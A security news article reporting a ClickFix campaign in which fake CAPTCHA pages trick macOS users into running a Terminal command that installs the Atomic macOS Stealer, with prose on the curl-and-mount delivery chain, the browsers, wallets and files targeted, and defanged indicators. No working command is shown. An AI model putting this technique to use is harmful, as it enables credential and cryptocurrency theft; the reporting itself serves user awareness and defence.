Cybersecurity researchers have uncovered a new campaign targeting macOS users with the Atomic macOS Stealer (AMOS) malware through a growing social engineering tactic known as ClickFix.
The campaign starts with a fake CAPTCHA page that instructs users to open the macOS Terminal app and paste a command to verify they are human. While the process appears legitimate, the command actually downloads and launches malware on the victim’s device.
Researchers from Palo Alto Networks Unit 42 found that the malicious command silently downloads a disk image (DMG) file from an attacker-controlled server, mounts it using macOS’s built-in tools, and automatically launches the application contained inside. Unlike earlier attacks that required users to open downloaded files manually, this method streamlines the infection process and reduces user interaction.
ClickFix attacks have become increasingly popular over the past year. Cybercriminals and even state-backed threat actors have used fake browser errors, system alerts, and CAPTCHA pages to convince users to execute malicious commands on their own devices.
In this campaign, the Terminal command downloads a malicious DMG file to a temporary folder using curl, then mounts it without displaying it in Finder. The script searches for an application or installer package inside the mounted image and launches it automatically.
Researchers observed the malware being delivered through a disk image named “s.01M0td.dmg,” which contained a self-signed application called “NNApp.app.” The payload belongs to the Atomic macOS Stealer family, a well-known information-stealing malware targeting Apple devices.
Once installed, the malware displays a fake system authentication prompt designed to trick users into entering their macOS password. If entered, the password is captured by the attackers.
The stealer targets a wide range of browsers, including Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex. It steals stored passwords, cookies, payment card information, browser profiles, browsing history, and authentication tokens.
Firefox-based browsers are also targeted, including LibreWolf, SeaMonkey, Tor Browser, Waterfox, and Zen Browser. The malware also collects similar information from these browsers.
Cryptocurrency users face additional risks. The malware searches for wallet data associated with Exodus, Electrum, Atomic Wallet, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance Wallet, Dogecoin Wallet, and TonKeeper.
Researchers also found that the malware steals data from Telegram Desktop, Discord, Apple Notes, Safari, and Apple Keychain databases. User documents with PDF, TXT, and RTF file extensions are also collected.
All stolen information is compressed into a ZIP archive and uploaded to servers controlled by the attackers. The researchers also discovered that the malware can replace legitimate installations of Ledger Live and Trezor Suite with malicious versions, potentially enabling cryptocurrency theft.
The campaign was linked to command-and-control infrastructure hosted at svs-verificationdate[.]beer and 196.251.107[.]171.
If this article helped you, please consider supporting our work. Every small contribution keeps Abijita.com independent and running.
Security experts advise users to be extremely cautious when websites ask them to open Terminal and run commands. CAPTCHA pages, browser fixes, and troubleshooting instructions should never require users to execute commands they do not fully understand. If you cannot clearly identify what a command does, do not run it.
